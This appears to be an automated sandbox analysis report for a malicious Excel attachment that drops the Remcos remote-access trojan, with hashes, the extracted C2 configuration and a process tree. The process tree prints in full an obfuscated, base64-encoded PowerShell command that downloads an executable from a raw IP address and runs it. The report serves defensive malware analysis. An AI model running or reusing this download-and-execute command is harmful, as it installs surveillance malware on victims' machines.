Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16-12-2024 16:04

General

  • Target

    Smple_Order-048576744759475945.xls

  • Size

    1.1MB

  • MD5

    df946e734bca37e4eaf06978a0b95ef1

  • SHA1

    c06f8ddc7d5cb1030c516286bd0a660502cbbe35

  • SHA256

    7fb0d13c333aef86316da1494da234eade3b8db44fddd27affc38bae40614744

  • SHA512

    e9dd9266c4dc5721b47d1d4de0e1525482cbec8330e5003f0444d940c99380efae89f7424d709e7aac4962e2541d84b06c1fb7d4686e0949a852e83b39d5dc96

  • SSDEEP

    12288:qymzHJEUiOIBUzMTSgD3DERnLRmF8DrEPTxpsAQx1Zj+j+EPebSA5YiA76UdKX/E:4BaRbARM8+D8Z+jJC50YrNPkly4h

Malware Config

Extracted

Family

remcos

Botnet

elvis

C2

107.173.4.16:2560

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-GJDISH

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Detected phishing page

    Hiding page source

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Smple_Order-048576744759475945.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2212
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:496
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2856
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sudgql20.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1932
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES12F5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC12F4.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1040
        • C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe
          "C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2472

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

    Filesize

    2KB

    MD5

    bf784edee93fca58a4f656c76f07c1b4

    SHA1

    4965c03faaeec20f1b0cefa4844608e403d2569c

    SHA256

    82e0e5014ce5a84bb7fd5e2569c66912fbf4b6262c7f0e94f9a7085ff044188f

    SHA512

    3c480e5ddde056f5b250f66018b78158ecb265f7843416720fbf6dd8038ec2e3d4eca5655c85659d1e7fe5d887cc93e112861beb3aa2524a1d4f9fb2725e6475

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\87063374136EEC47E933C8519BBDFF7F

    Filesize

    471B

    MD5

    ec8ad116b8a2c7a84562946fb93a7daa

    SHA1

    7ba698b804d3c327f61869b080966f8db9e852b1

    SHA256

    34e9140675aa2c972f1b80efa2ad4bdc13a1a4e4b4fb91321618bbff03eab2c8

    SHA512

    d1c477afa27a6c1d21f4c504e334ba299eeddaa48ab9df75e8516bb054dc723645a7f612be68055bf83e245fd74193fb7b797c81cebf2488d6dd42e10ef29ec5

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

    Filesize

    1KB

    MD5

    9047d91427fbc84f6f261fa8961d626b

    SHA1

    a51383a0e9eccbe2032f19ff1d5c91e866cfb69f

    SHA256

    3181b9f6bf992319794a86f7f27631619c7fcae1e208f4ced04e64b7ea577a19

    SHA512

    dc21fb378f8ef75fab3c7e80bf1fb7deb2364631a939d1ed113199be83e4a18113795b57620bdbf056876515293f79e8f50b3869b7ad175e073013b0616cba85

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

    Filesize

    488B

    MD5

    4523ef39fff54e571d4130f3d17a519c

    SHA1

    bbbe163bb966da25add20a54f06d3cfa58cb3fe6

    SHA256

    7bded333b5d4082aa06ac59e969f040b50b9a1960217c254f7159ba47af54bb1

    SHA512

    16af3cf5755ff3ae5d2002a4c34cb4634aee8b6cdea2b8b688e76fdb4ec7c7000b74a8a2c39a4cc88d22e2c5304c269fffaa1a43d1a2e18b309eb8a6b9f78795

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\87063374136EEC47E933C8519BBDFF7F

    Filesize

    480B

    MD5

    11927aac598e00fe30ae0ecc529d6271

    SHA1

    6949d566ce772868d1b4f597a0066e27c1b31bfe

    SHA256

    f6315d6c083962771c83a534464bde337def5c9f051435ad9f728a44d3e7bbee

    SHA512

    10caed8d6caec072abb53c4d1ae1b868003ac7f27ffb88548cc7571d575d7d69fffdbe86b08e0e208f7b6cdd0e0222d3a49ff1d632c6727330e13d8791fdfc82

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    1fdfebbfc42e9d5b3f137aebf6952df4

    SHA1

    0b26f3e0ceb1535d476e0889dd8733815bd62ed9

    SHA256

    779aea408665d847ccc93f5fde640471b243bd73ad7249d3266dc9cf08cdf123

    SHA512

    9b1c41a0ee10edf2e0030b2f9b22314a90e1bfbe5de00df0b878907eb8a02100fb3e64956cd9c6816fc35b9e3c2f118ffebc82e41e0314eb7cee3acbb3cf927d

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

    Filesize

    482B

    MD5

    69e9364b770e6ecc3fcd86a929b915f9

    SHA1

    d0a8bad7b96a8c6f866929bd34726d7ed1081ba1

    SHA256

    e5d3cd75910203981a618eaf200b83bd2ba537f1c78a91ff515dbed7481c8368

    SHA512

    ac065cdc4a1580dd4cbf9e01c9ed3c123d8404c5a22915f57442f5ff81dfd502aa5252ea24f50cf37f87f4c8ebfbd0d1c4d45a151b7ee5e4da10de383b38b02f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\crreatedbestthingswithgreatattitudeneedforthat[1].hta

    Filesize

    8KB

    MD5

    e4c5ceeb8c98c1c23a0ff6cd1a4d36e4

    SHA1

    033d24c4375394ad9ede6a94cc80bca6b47a1ef7

    SHA256

    bea2fd609f237d38625a50f7bb5688e7dcfdeb39e5641bb881e257807761b902

    SHA512

    b152a9bcbef1fb5594f0a4f4c9d0e59ffa748a226cefbd967d65aed315d2230ad340d345077866f6d1682e892e5dab9a8b776a7152759db1c4834ab6678337a1

  • C:\Users\Admin\AppData\Local\Temp\CabFF58.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RES12F5.tmp

    Filesize

    1KB

    MD5

    17bca12748b3f8c2dc51818ffcf6dd38

    SHA1

    9bb842322e34cfe0f700be0f4a2412834d508a7e

    SHA256

    e42f267c899c0cd4dbb10d33b1b9e3f790792074607f82076caf457d5ca1500b

    SHA512

    b95b4a5856dd0d17584091005edae2c5216efa6489630f207cf29e00aa0bb0f61e60ffe40f8605fee9c9116c45a4c8e91f78f510597568bb9adf3aa30492b86a

  • C:\Users\Admin\AppData\Local\Temp\TarFF7A.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\sudgql20.dll

    Filesize

    3KB

    MD5

    e18e437b61703fc5b2e33f5150318d0c

    SHA1

    097c4651a629a9a98540fd98934bab763fb2cff7

    SHA256

    62c772a8d9fb92d7fc69f72091ce754f2fa4f7d669e291e998346cd6ecb97b70

    SHA512

    da73dbc58cd02b34f0fe9b37e4fca75321c3e9f5cab7d52ff2cc3c4e30feec242ac56a8b27a5abae17928dd96ca779a4ed6a7bbbae48df7b82d5f9cf7d5bee2f

  • C:\Users\Admin\AppData\Local\Temp\sudgql20.pdb

    Filesize

    7KB

    MD5

    967cb456a784b4f7fbcb1e655d44fead

    SHA1

    0a2caa5f55d92410af705dc550f739760f89cbbd

    SHA256

    ed4dcc24818e20d6cc1bf3d15c9c4e86d4b1e54ce966ef93d3418d62ab0adb3c

    SHA512

    2b327bdda3fa28c6322cfe8a814e9068f4be1a2433b589f40b274e4eaa2d7913491c0a1f65f1b182d989d087a22a72371094b0c822a507ea2950a659038ae2bf

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC12F4.tmp

    Filesize

    652B

    MD5

    b88f1fd56649825e48b2ed7c57671678

    SHA1

    6b51511b96abbf32ba72895263b9673cda16fc21

    SHA256

    628736e4e04d4d70feec5c62d3433c855e9cd08352deaab9451b6669e05d8f7d

    SHA512

    3b53b9711829d9ae15fe7653bdb55f46e361f8f9ff5865cee4dd020158b01f7d1a0dc2066ca78b6110a719e1557a01aa1afbb8c299d30622184f73881a77b007

  • \??\c:\Users\Admin\AppData\Local\Temp\sudgql20.0.cs

    Filesize

    478B

    MD5

    80c03b4485808d996cc8226157f377a7

    SHA1

    7cc7e02b84232b1523c555a349c86fc059a98eff

    SHA256

    240b4ca770e75d02c83cb17844897b66b8c671c1477654d797146a19e0bcf12d

    SHA512

    ee72fd6d3ec1d6a3645c59c72a7816bcf6cf34b04683a2611eedb1897d5781c7fb92bdb1d295671b2c107a2008100e8ab1010a7401bd6c651bfed2219f15656c

  • \??\c:\Users\Admin\AppData\Local\Temp\sudgql20.cmdline

    Filesize

    309B

    MD5

    095ffa269722a5bc3b1c9970dc0c037c

    SHA1

    6c46b4e9f03d7ecd4ffbcd0985137d8a4596ab91

    SHA256

    b962ae182700d254d9aa7d85643a69905b594025b5f3c995eb55c9833d37db2f

    SHA512

    689fae804210ee6c723ce8d6e7536305c71fca62fffa860de3c973aa8dc9d24bda03e05e25cd9af6ee72ac7a26a7ca5c744fd66112cd31efea5e7aec7b65ac30

  • \Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe

    Filesize

    528KB

    MD5

    a2d03c5333bfecca62720cd6ee3a4dc4

    SHA1

    ce4c380f2748f375904c17b38d4f93e294fef4f6

    SHA256

    ef8ec5181ab4cf85a5c4867089594f40900eaafb514496905eb86314c460178e

    SHA512

    5c9db8bb415da332c0adc24519ae0410a65aba932de15a682ce57efbc61b8b7d7e5e3548164909a5da5bc6966c351528626655fdbb7c21f3b4fd1974406ae04c

  • memory/2088-60-0x0000000002540000-0x0000000002542000-memory.dmp

    Filesize

    8KB

  • memory/2212-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2212-61-0x0000000003ED0000-0x0000000003ED2000-memory.dmp

    Filesize

    8KB

  • memory/2212-1-0x0000000072C8D000-0x0000000072C98000-memory.dmp

    Filesize

    44KB

  • memory/2212-102-0x0000000072C8D000-0x0000000072C98000-memory.dmp

    Filesize

    44KB

  • memory/2472-117-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2472-116-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2472-115-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2472-118-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2472-119-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2472-120-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2472-121-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2472-122-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2472-123-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2472-124-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2472-125-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2472-126-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2472-127-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB